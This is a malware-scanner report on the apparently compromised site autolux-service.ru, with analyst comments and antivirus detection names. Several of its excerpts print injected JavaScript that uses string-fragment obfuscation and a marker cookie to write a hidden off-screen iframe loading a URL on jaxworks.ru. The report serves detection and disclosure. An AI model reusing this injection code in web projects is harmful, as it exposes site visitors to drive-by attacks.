
Malware Scanner report for autolux-service.ru

Malicious/Suspicious/Total URLs checked
9/1/12
10 pages have malicious or suspicious code. See details below.
Blacklists
Found
The website is marked by Yandex as suspicious.

The website "autolux-service.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/18
Deface / Content modification
OK


Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=autolux-service.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://autolux-service.ru/

Result: The website is marked by Yandex as suspicious: visiting this website may harm your computer.
Details are available here.

Scanned pages/files

Request | Server response | Status
http://www.autolux-service.ru/
200 OK
Content-Length: 26542
Content-Type: text/html
suspicious
Suspicious code found

</span>

http://www.autolux-service.ru/cms/classes/js/menu.js
200 OK
Content-Length: 14859
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
// [analyst note] Case-insensitive substring search; the name and the index-or-false
// return mirror PHP's stripos(). Both arguments are coerced to strings and lower-cased,
// then indexOf() is run starting at f_offset.
// Returns the match index (0 for a match at the start, so callers must test === false),
// or false when the needle is absent. The callers are in the skipped bytes —
// presumably the user-agent filter that follows; confirm against the full sample.
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function barashkalo(){
var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/1
... 3277 bytes are skipped ...
tedTarget&&!contains_ns6(a.currentTarget,a.relatedTarget)&&delayhidemenu()}function hidemenu(){if(typeof dropmenuobj!="undefined")if(ie4||ns6)dropmenuobj.style.visibility="hidden"}
function delayhidemenu(){if(ie4||ns6)delayhide=setTimeout("hidemenu()",disappeardelay)}function clearhidemenu(){typeof delayhide!="undefined"&&clearTimeout(delayhide)}if(hidemenu_onclick=="yes")document.onclick=hidemenu;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Antivirus reports:

Avast
JS:Includer-BEX [Trj]
DrWeb
JS.IFrame.566
Microsoft
Trojan:JS/Iframe.DI
NANO-Antivirus
Trojan.Script.Iframe.brqwio
VIPRE
Malware.JS.Generic (JS)
Avira
HTML/Rce.Gen
AVG
HTML/Framer
Norman
Iframe.ZX
Sophos
Troj/JSRedir-LH
AVware
Malware.JS.Generic (JS)

http://www.autolux-service.ru/cms/classes/js/gpl_ajax.js
404 Not Found
Content-Length: 0
Content-Type: text/html
clean
http://www.autolux-service.ru/test404page.js
404 Not Found
Content-Length: 0
Content-Type: text/html
clean
http://www.autolux-service.ru/cms/classes/js/js_edit.js
200 OK
Content-Length: 20511
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
// [analyst note] Case-insensitive substring search; the name and the index-or-false
// return mirror PHP's stripos(). Both arguments are coerced to strings and lower-cased,
// then indexOf() is run starting at f_offset.
// Returns the match index (0 for a match at the start, so callers must test === false),
// or false when the needle is absent. The callers are in the skipped bytes —
// presumably the user-agent filter that follows; confirm against the full sample.
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function barashkalo(){
var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/1
... 3400 bytes are skipped ...
nuNewsBuild(a,c){var b=[];b[0]="<a onclick=\"ajax_prep_for_edit('"+a+"', '"+c+'\'); return false;" href="#">'+menu_short+"</a>";if(dle_admin!="")b[1]='<a href="'+dle_root+dle_admin+"?mod=editnews&action=editnews&id="+a+'" target="_blank">'+menu_full+"</a>";if(allow_dle_delete_news)b[2]="<a onclick=\"dle_news_delete ('"+a+'\'); return false;" href="#">'+dle_del_news+"</a>";return b};;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Antivirus reports:

Avast
JS:Includer-BEX [Trj]
DrWeb
JS.IFrame.566
NANO-Antivirus
Trojan.Script.Iframe.brqwio
VIPRE
Malware.JS.Generic (JS)
Avira
HTML/Rce.Gen
AVG
HTML/Framer
Norman
Iframe.ZX
Sophos
Troj/JSRedir-LH
AVware
Malware.JS.Generic (JS)

http://www.autolux-service.ru/templates/grab/js/noobslide.js
200 OK
Content-Length: 7338
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
// [analyst note] Case-insensitive substring search; the name and the index-or-false
// return mirror PHP's stripos(). Both arguments are coerced to strings and lower-cased,
// then indexOf() is run starting at f_offset.
// Returns the match index (0 for a match at the start, so callers must test === false),
// or false when the needle is absent. The callers are in the skipped bytes —
// presumably the user-agent filter that follows; confirm against the full sample.
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function barashkalo(){
var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/1
... 2518 bytes are skipped ...
s[1]) : undefined;
}
// [analyst note] Injection stage of the sample. braborossa() is defined in the skipped
// bytes; presumably it is the visitor filter — confirm against the full file.
if (!braborossa()) {
// The cookie name is assembled from short fragments at runtime
// ("lisergin28fuaidanub3a8a9"), so it never appears as one literal in the file.
var cookie = getCookie('li'+'se'+'rg'+'in2'+'8f'+'u'+'ai'+'da'+'nu'+'b3'+'a8'+'a9');
// Loose == also matches null; the branch runs only when the marker cookie is absent.
if (cookie == undefined) {
// The marker cookie is set before the write, so the frame is emitted at most once per
// cookie lifetime. 259200 would be 3 days if setCookie() takes seconds — its
// definition is not in the excerpt, TODO confirm.
setCookie('li'+'se'+'rg'+'in2'+'8f'+'u'+'ai'+'da'+'nu'+'b3'+'a8'+'a9', true, 259200);
// The <iframe> tag is split into fragments in the same way. The frame loads the
// jaxworks.ru URL and is positioned 1000px off-screen, so the visitor sees nothing.
// The cookie name and the frame host are the two indicators visible in this excerpt.
document.write('<i'+'f'+'r'+'a'+'m'+'e'+' src='+'http://jaxworks.ru/ghj5.u35hh55hj?7'+' style="position:absolute;left:-1000px;top:-1000px;" height="115" width="115">'+'<'+'/'+'i'+'f'+'r'+'a'+'m'+'e>');
}
};
})();

Antivirus reports:

Avast
JS:Includer-BEX [Trj]
DrWeb
JS.IFrame.566
AVG
HTML/Framer
Sophos
Troj/JSRedir-LH

http://www.autolux-service.ru/templates/grab/js/jquery.js
200 OK
Content-Length: 41774
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
// [analyst note] Case-insensitive substring search; the name and the index-or-false
// return mirror PHP's stripos(). Both arguments are coerced to strings and lower-cased,
// then indexOf() is run starting at f_offset.
// Returns the match index (0 for a match at the start, so callers must test === false),
// or false when the needle is absent. The callers are in the skipped bytes —
// presumably the user-agent filter that follows; confirm against the full sample.
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function barashkalo(){
var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/1
... 3196 bytes are skipped ...
ggle|slideUp|changed|slideDown|be|can|property|responseXML|content|1223|getAttributeNode|300|method|protocol|location|action|send|abort|cssText|th|td|cap|specified|Accept|With|colg|Requested|fast|tfoot|GMT|thead|1970|Jan|attributes|01|Thu|leg|Since|If|opt|Type|Content|embed|open|area|XMLHTTP|hr|Microsoft|onreadystatechange|onload|meta|adobeair|charset|http|1_|img|br|plain|borderLeftWidth|borderTopWidth|abbr'.split('|'),0,{}));;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Antivirus reports:

Avast
JS:Includer-BEX [Trj]
DrWeb
JS.IFrame.566
NANO-Antivirus
Trojan.Script.Iframe.brqwio
VIPRE
Malware.JS.Generic (JS)
Avira
HTML/Rce.Gen
AVG
HTML/Framer
Norman
Iframe.ZX
Sophos
Troj/JSRedir-LH
AVware
Malware.JS.Generic (JS)

http://www.autolux-service.ru/templates/grab/js/tabs.js
200 OK
Content-Length: 12435
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
// [analyst note] Case-insensitive substring search; the name and the index-or-false
// return mirror PHP's stripos(). Both arguments are coerced to strings and lower-cased,
// then indexOf() is run starting at f_offset.
// Returns the match index (0 for a match at the start, so callers must test === false),
// or false when the needle is absent. The callers are in the skipped bytes —
// presumably the user-agent filter that follows; confirm against the full sample.
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function barashkalo(){
var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/1
... 3422 bytes are skipped ...
s1 li').click(function(){
var thisClass = this.className.slice(0,2);
$j('div.t1').hide();
$j('div.t2').hide();
$j('div.t3').hide();
$j('div.t4').hide();
$j('div.' + thisClass).show();
$j('ul.tabs.tabs1 li').removeClass('tab-current');
$j(this).addClass('tab-current');
});

$j("#featured > ul").tabs({fx:{opacity: "toggle"}}).tabs("rotate", 5000, true);
});;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Antivirus reports:

Avast
JS:Includer-BEX [Trj]
DrWeb
JS.IFrame.566
Microsoft
Trojan:JS/Iframe.DI
NANO-Antivirus
Trojan.Script.Iframe.brqwio
VIPRE
Malware.JS.Generic (JS)
Avira
HTML/Rce.Gen
AVG
HTML/Framer
Norman
Iframe.ZX
Sophos
Troj/JSRedir-LH
AVware
Malware.JS.Generic (JS)

http://www.autolux-service.ru/templates/grab/js/jquery-ui.min.js
200 OK
Content-Length: 7338
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
// [analyst note] Case-insensitive substring search; the name and the index-or-false
// return mirror PHP's stripos(). Both arguments are coerced to strings and lower-cased,
// then indexOf() is run starting at f_offset.
// Returns the match index (0 for a match at the start, so callers must test === false),
// or false when the needle is absent. The callers are in the skipped bytes —
// presumably the user-agent filter that follows; confirm against the full sample.
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function barashkalo(){
var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/1
... 2518 bytes are skipped ...
s[1]) : undefined;
}
// [analyst note] Injection stage of the sample. braborossa() is defined in the skipped
// bytes; presumably it is the visitor filter — confirm against the full file.
if (!braborossa()) {
// The cookie name is assembled from short fragments at runtime
// ("lisergin28fuaidanub3a8a9"), so it never appears as one literal in the file.
var cookie = getCookie('li'+'se'+'rg'+'in2'+'8f'+'u'+'ai'+'da'+'nu'+'b3'+'a8'+'a9');
// Loose == also matches null; the branch runs only when the marker cookie is absent.
if (cookie == undefined) {
// The marker cookie is set before the write, so the frame is emitted at most once per
// cookie lifetime. 259200 would be 3 days if setCookie() takes seconds — its
// definition is not in the excerpt, TODO confirm.
setCookie('li'+'se'+'rg'+'in2'+'8f'+'u'+'ai'+'da'+'nu'+'b3'+'a8'+'a9', true, 259200);
// The <iframe> tag is split into fragments in the same way. The frame loads the
// jaxworks.ru URL and is positioned 1000px off-screen, so the visitor sees nothing.
// The cookie name and the frame host are the two indicators visible in this excerpt.
document.write('<i'+'f'+'r'+'a'+'m'+'e'+' src='+'http://jaxworks.ru/ghj5.u35hh55hj?7'+' style="position:absolute;left:-1000px;top:-1000px;" height="115" width="115">'+'<'+'/'+'i'+'f'+'r'+'a'+'m'+'e>');
}
};
})();

Antivirus reports:

Avast
JS:Includer-BEX [Trj]
DrWeb
JS.IFrame.566
AVG
HTML/Framer
Sophos
Troj/JSRedir-LH

http://www.autolux-service.ru/templates/grab/js/qTip.js
200 OK
Content-Length: 15078
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
// [analyst note] Case-insensitive substring search; the name and the index-or-false
// return mirror PHP's stripos(). Both arguments are coerced to strings and lower-cased,
// then indexOf() is run starting at f_offset.
// Returns the match index (0 for a match at the start, so callers must test === false),
// or false when the needle is absent. The callers are in the skipped bytes —
// presumably the user-agent filter that follows; confirm against the full sample.
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function barashkalo(){
var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/1
... 3474 bytes are skipped ...
br/> this.tip.style.top = (y + this.offsetY) + "px";
}

// [analyst note] Tail of qTip.js as shown by the scanner. Nothing in the excerpt ties
// these handlers to the injected block at the top of the file — presumably this is the
// site's own tooltip code; confirm against a clean copy.
// show(): does nothing until this.tip is set; `text` is written through innerHTML,
// so it is parsed as markup rather than shown as plain text.
tooltip.show = function (text) {
if (!this.tip) return;
this.tip.innerHTML = text;
this.tip.style.display = "block";
}

// hide(): clears the tooltip content and hides the element; same this.tip guard.
tooltip.hide = function () {
if (!this.tip) return;
this.tip.innerHTML = "";
this.tip.style.display = "none";
}

// [analyst note] Plain assignment, so this replaces any window.onload handler set earlier.
// The long run of empty statements after the closing brace also ends the menu.js,
// js_edit.js, jquery.js, tabs.js and swfobject.js excerpts in this report — possibly
// padding left by whatever modified the files; TODO confirm against a clean copy.
window.onload = function () {
tooltip.init ();
};;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Antivirus reports:

Avast
JS:Includer-BEX [Trj]
DrWeb
JS.IFrame.566
Microsoft
Trojan:JS/Iframe.DI
NANO-Antivirus
Trojan.Script.Iframe.brqwio
VIPRE
Malware.JS.Generic (JS)
Avira
HTML/Rce.Gen
AVG
HTML/Framer
Norman
Iframe.ZX
Sophos
Troj/JSRedir-LH
AVware
Malware.JS.Generic (JS)

http://www.autolux-service.ru/cms/classes/tagcloud/swfobject.js
200 OK
Content-Length: 18818
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
// [analyst note] Case-insensitive substring search; the name and the index-or-false
// return mirror PHP's stripos(). Both arguments are coerced to strings and lower-cased,
// then indexOf() is run starting at f_offset.
// Returns the match index (0 for a match at the start, so callers must test === false),
// or false when the needle is absent. The callers are in the skipped bytes —
// presumably the user-agent filter that follows; confirm against the full sample.
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function barashkalo(){
var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/1
... 3229 bytes are skipped ...
dler=function(){};window.attachEvent("onunload",deconcept.SWFObjectUtil.cleanupSWFs);};window.attachEvent("onbeforeunload",deconcept.SWFObjectUtil.prepUnload);deconcept.unloadSet=true;}}if(!document.getElementById&&document.all){document.getElementById=function(id){return document.all[id];};}var getQueryParamValue=deconcept.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Antivirus reports:

Avast
JS:Includer-BEX [Trj]
DrWeb
JS.IFrame.566
NANO-Antivirus
Trojan.Script.Iframe.brqwio
VIPRE
Malware.JS.Generic (JS)
Avira
HTML/Rce.Gen
AVG
HTML/Framer
Norman
Iframe.ZX
Sophos
Troj/JSRedir-LH

http://www.autolux-service.ru/js/syhyqu.js
200 OK
Content-Length: 112075
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,b=function(e,t){return new b.fn.init(e,t,r)},x=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,w=/\S+/g,T=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:(<[\w\W]+>)[^>]*|#([\w-]*))$/,C=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,k=/^[\],:{}\s]*$/,E=/(?:^|:|,)(?:\s*\[)+/g,S=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,A=/"[^"\\
... 3350 bytes are skipped ...
oad = function() {
if (!mdom) {
newDiv = document.createElement('p'); newDiv.innerHTML = "<div style='text-align:center; padding-top: 10px; padding-bottom: 10px; background-color:white' class='basic-modal' onclick='click_banner555();' style='cursor:hand'><img src='/sale.png' style='cursor:hand'></div>";
if (document.body.firstChild) { document.body.insertBefore(newDiv, document.body.firstChild); } else { document.body.appendChild(newDiv); }
}
}

Antivirus reports:

Bkav
W32.HfsIframe.3abf


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: autolux-service.ru

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: autolux-service.ru
Referer: http://www.google.com/search?q=autolux-service.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.